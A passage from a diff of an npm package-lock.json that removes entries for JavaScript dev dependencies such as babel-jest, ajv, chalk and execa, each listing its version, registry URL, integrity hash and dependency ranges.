"integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/tough-cookie": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.1.tgz", - "integrity": "sha512-Y0K95ThC3esLEYD6ZuqNek29lNX2EM1qxV8y2FTLUB0ff5wWrk7az+mLrnNFUnaXcgKye22+sFBRXOgpPILZNg==", - "dev": true - }, - "node_modules/@types/ws": { - "version": "8.5.4", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.4.tgz", - "integrity": "sha512-zdQDHKUgcX/zBc4GrwsE/7dVdAD8JR4EuiAXiiUhhfyIJXXb2+PrGshFyeXWQPMmmZ2XxgaqclgpIC7eTXc1mg==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dev": true, - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" - } - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dev": true, - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "dev": true, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/async": { - "version": "3.2.6", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", - "dev": true - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=", - "dev": true - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", - "dev": true, - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==", - "dev": true - }, - "node_modules/babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dev": true, - "dependencies": { - "tweetnacl": "^0.14.3" - } - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "dependencies": { - "fill-range": "^7.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", - "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "dependencies": { - "fast-json-stable-stringify": "2.x" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=", - "dev": true - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.7.1", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.7.1.tgz", - "integrity": "sha512-4jYS4MOAaCIStSRwiuxc4B8MYhIe676yO1sYGzARnjXkWpmzZMMYxY6zu8WYWDhSuth5zhrQ1rhNSibyyvv4/w==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dev": true, - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=", - "dev": true - }, - "node_modules/create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - }, - "bin": { - "create-jest": "bin/create-jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "dev": true, - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "peerDependencies": { - "babel-plugin-macros": "^3.1.0" - }, - "peerDependenciesMeta": { - "babel-plugin-macros": { - "optional": true - } - } - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", - "dev": true, - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "dev": true, - "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "node_modules/ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "dependencies": { - "jake": "^10.8.5" - }, - "bin": { - "ejs": "bin/cli.js" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - 